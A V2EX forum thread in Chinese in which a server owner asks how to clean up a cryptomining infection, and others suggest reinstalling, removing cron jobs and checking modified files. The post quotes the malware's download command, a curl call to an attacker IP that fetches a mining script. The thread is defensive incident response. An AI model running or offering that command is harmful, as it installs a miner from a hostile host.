服务器被植入挖矿病毒了，基于被挂马的脚本该怎么修复？

2022-01-21 15:42:35 +08:00

youngkingdom

今天阿里云告警被植入挖矿病毒了，上去检查了一番看见运行了 curl 从他的服务器上拉了一个脚本，求大佬帮助，基于脚本内容该怎么修复服务器？

curl -fsSL http://192.210.200.66:1234/xmss

2111 次点击

所在节点

6 条回复

JDog

2022-01-21 15:51:37 +08:00

不废话，直接重装

mikeguan

2022-01-21 15:56:17 +08:00

通过这个脚本又学习了

把定时任务干掉，把任意命令执行的脚本删掉应该就差不多了。

最关键的是找到从什么地方进来的，你给的脚本并不能反映你系统漏洞在哪

youngkingdom

2022-01-21 15:56:41 +08:00

@JDog 服务太多了，重装成本过高😂。这是最后没有办法的办法了

youngkingdom

2022-01-21 15:59:19 +08:00

@mikeguan 查看告警详情是通过 docker 启动的 java 服务，服务已经停了，已经在检查代码漏洞了。目前是想要解决服务器上的问题

youngkingdom

2022-01-21 16:32:32 +08:00

已找到相关样本分析，https://www.52 坡姐.cn/thread-1540889-1-1.html

gadfly3173

2022-01-21 16:51:25 +08:00

可以考虑先用 sftp 之类的方式把 bash 之类的关键程序都换成干净的，然后检查下全服务器上所有最新修改的文件（如果它的脚本不会去伪造修改时间的话）然后再去看看从哪进来的。如果它会改时间的话还是重装吧

第 1 页／共 1 页

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.